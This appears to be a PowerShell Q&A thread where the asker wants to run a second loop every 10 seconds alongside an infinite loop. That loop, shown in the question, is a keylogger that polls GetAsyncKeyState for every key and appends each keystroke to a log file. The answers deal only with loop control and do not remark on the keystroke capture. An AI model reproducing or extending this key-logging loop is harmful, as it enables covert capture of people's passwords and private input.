# how can I add two true while on the same while?

Tags: powershell

I want to keep running forever the appending function to file , but I aslo want to add a second true while that runs x stuff every 10s , but how can I handle that?

I have tried doing `while($true){while ($true) {
    write-host 'do stuff...'
    Start-Sleep -Seconds 60
} }` , but I dindt have a luck.

```
while ($true) {
      Start-Sleep -Milliseconds 40

      # scan all ASCII codes above 8
      for ($ascii = 9; $ascii -le 254; $ascii++) {
        # get current key state
        $state = $API::GetAsyncKeyState($ascii)

        # is key pressed?
        if ($state -eq -32767) {
          $null = [console]::CapsLock

          # translate scan code to real code
          $virtualKey = $API::MapVirtualKey($ascii, 3)

          # get keyboard state for virtual keys
          $kbstate = New-Object Byte[] 256
          $checkkbstate = $API::GetKeyboardState($kbstate)

          # prepare a StringBuilder to receive input key
          $mychar = New-Object -TypeName System.Text.StringBuilder

          # translate virtual key
          $success = $API::ToUnicode($ascii, $virtualKey, $kbstate, $mychar, $mychar.Capacity, 0)

          if ($success) 
          {
            # add key to logger file
            [System.IO.File]::AppendAllText($Path, $mychar, [System.Text.Encoding]::Unicode) 
          }
        }
      }
    }
```

I expect my first while true append every log to the file forever , but I also want to keep running every 10s to the second while true , but how can I do this?

Comment: If you want a double while, you need to exit at some point the inner while loop so it can go back into the outer while. To do so, add a  break statement at the end of your inner while. When reached, it tells Powershell to exit that while, sending the execution back to the outer loop.

Comment: in code level how would it be?

Comment: https://pastebin.com/qqSLcxbi  That being said, if the inner loop take 15 seconds to execute, it means you won't get to the code of the outer loop every 10 seconds.

Comment: Why permanent `$True` ? Rather use a real condition or a `for`-loop. Especialy when you concatenate them you can use the control variable of the outer `for`-loop in the condition of the inner one.

Answer (score 1):

Have separate scripts for both actions. One with infinite while loop another with the delay and call them as background jobs.

```
$AppendJob = Start-Job -FilePath c:\Temp\FirstWhile.ps1 -Name AppenJob
$DelayJob = Start-Job -FilePath c:\Temp\SecondWhile.ps1 -Name DelayJob
```

Answer (score 1):

Another possible solution not yet mentionned would be to keep you main loop and have a timer event registered for the 10 seconds "loop".

```
$timer = new-object timers.timer 
$action = {
        # Edit me... put whatever you want to be done every 10 seconds here instead.
        write-host "Timer Elapse Event: $(get-date -Format ‘HH:mm:ss’)" -ForegroundColor Cyan
        } 

$timer.Interval = 10000 #10 seconds  
Register-ObjectEvent -InputObject $timer -EventName elapsed –SourceIdentifier '10secTimer' -Action $action 
$timer.start()


while ($true) {
    Write-Host 'Append to file...'
    Start-Sleep -Seconds 3
}


#to stop run 
$timer.stop() 
#cleanup 
Unregister-Event 10secTimer
```

You could also use one `while` loop and make use of a Stopwatch object to check when 10 seconds elapsed and perform another action then.

```
$StopWatch = New-Object -TypeName 'System.Diagnostics.Stopwatch'
$StopWatch.Start()

while ($true) {
    Write-Host 'Do stuff...' -ForegroundColor Cyan
    Write-Host "$($StopWatch.Elapsed.Seconds) seconds elapsed"
    Start-Sleep -Milliseconds 1000

    if ($StopWatch.Elapsed.Seconds -ge 10) {

        # Put everything for your 10 seconds here.
        Write-Host 'Do other stuff...' -ForegroundColor Green

        $StopWatch.Reset()
        $StopWatch.Start()
    }

}
$StopWatch.Stop()
```

To answer the "two true on the same while", if you wanted to use 2 While loop imbricated like your example, you'd need to add a `break` statement in the inner loop if you ever want to return to the outer loop.

```
while ($true) {
    Write-Host 'Outer loop...'
    Start-Sleep -Seconds 3

    While ($true) {
        Write-Host 'Inner loop...'
        break; # If you don't break, you'll never exit the inner loop.
       }
}
```

Answer (score 0):

Use the [modulus operator](https://learn.microsoft.com/en-us/previous-versions/visualstudio/visual-studio-2008/h6zfzfy7(v=vs.90)) `%` it will calculate the reminder after dividing by a number:

```
PS > 5 % 2
1
```

=> 5 /2 = 4 rest 1

```
PS > 250 % 250
0
```

Use `$I++` In your function to track how often it was executed and use `if` with `%` 
to execute it every 10 seconds (10 seconds / 0.040 Seconds = 250)

```
$I = 0
$I++
If (($I % 250) -eq 0) { do x }
```